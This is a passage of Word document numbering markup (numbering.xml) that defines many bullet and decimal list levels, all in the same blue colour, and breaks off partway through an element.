  <w:abstractNum w:abstractNumId="21834">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21835">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21836">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21837">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21838">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21839">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21840">
    <w:lvl>
      <w:start w:val="256"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21841">
    <w:lvl>
      <w:start w:val="257"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21842">
    <w:lvl>
      <w:start w:val="258"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21843">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21844">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21845">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21846">
    <w:lvl>
      <w:start w:val="259"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21847">
    <w:lvl>
      <w:start w:val="260"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21848">
    <w:lvl>
      <w:start w:val="261"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21849">
    <w:lvl>
      <w:start w:val="262"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21850">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21851">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21852">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21853">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21854">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21855">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21856">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21857">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21858">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21859">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21860">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21861">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21862">
    <w:lvl>
      <w:start w:val="263"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21863">
    <w:lvl>
      <w:start w:val="264"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21864">
    <w:lvl>
      <w:start w:val="265"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21865">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21866">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21867">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21868">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21869">
    <w:lvl>
      <w:start w:val="266"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21870">
    <w:lvl>
      <w:start w:val="267"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21871">
    <w:lvl>
      <w:start w:val="268"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21872">
    <w:lvl>
      <w:start w:val="269"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21873">
    <w:lvl>
      <w:start w:val="270"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21874">
    <w:lvl>
      <w:start w:val="271"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21875">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21876">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21877">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21878">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21879">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21880">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21881">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21882">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21883">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21884">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21885">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21886">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21887">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21888">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21889">
    <w:lvl>
      <w:start w:val="272"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21890">
    <w:lvl>
      <w:start w:val="273"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21891">
    <w:lvl>
      <w:start w:val="274"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21892">
    <w:lvl>
      <w:start w:val="275"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21893">
    <w:lvl>
      <w:start w:val="276"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21894">
    <w:lvl>
      <w:start w:val="277"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21895">
    <w:lvl>
      <w:start w:val="278"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21896">
    <w:lvl>
      <w:start w:val="279"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21897">
    <w:lvl>
      <w:start w:val="280"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21898">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21899">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21900">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21901">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21902">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21903">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21904">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21905">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21906">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21907">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21908">
    <w:lvl>
      <w:start w:val="281"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21909">
    <w:lvl>
      <w:start w:val="282"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21910">
    <w:lvl>
      <w:start w:val="283"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21911">
    <w:lvl>
      <w:start w:val="284"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21912">
    <w:lvl>
      <w:start w:val="285"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21913">
    <w:lvl>
      <w:start w:val="286"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21914">
    <w:lvl>
      <w:start w:val="287"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21915">
    <w:lvl>
      <w:start w:val="288"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21916">
    <w:lvl>
      <w:start w:val="289"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21917">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21918">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21919">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21920">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21921">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21922">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21923">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21924">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21925">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21926">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21927">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21928">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21929">
    <w:lvl>
      <w:start w:val="290"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21930">
    <w:lvl>
      <w:start w:val="291"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21931">
    <w:lvl>
      <w:start w:val="292"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21932">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21933">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21934">
    <w:lvl>
      <w:start w:val="293"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21935">
    <w:lvl>
      <w:start w:val="294"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21936">
    <w:lvl>
      <w:start w:val="295"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21937">
    <w:lvl>
      <w:start w:val="296"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21938">
    <w:lvl>
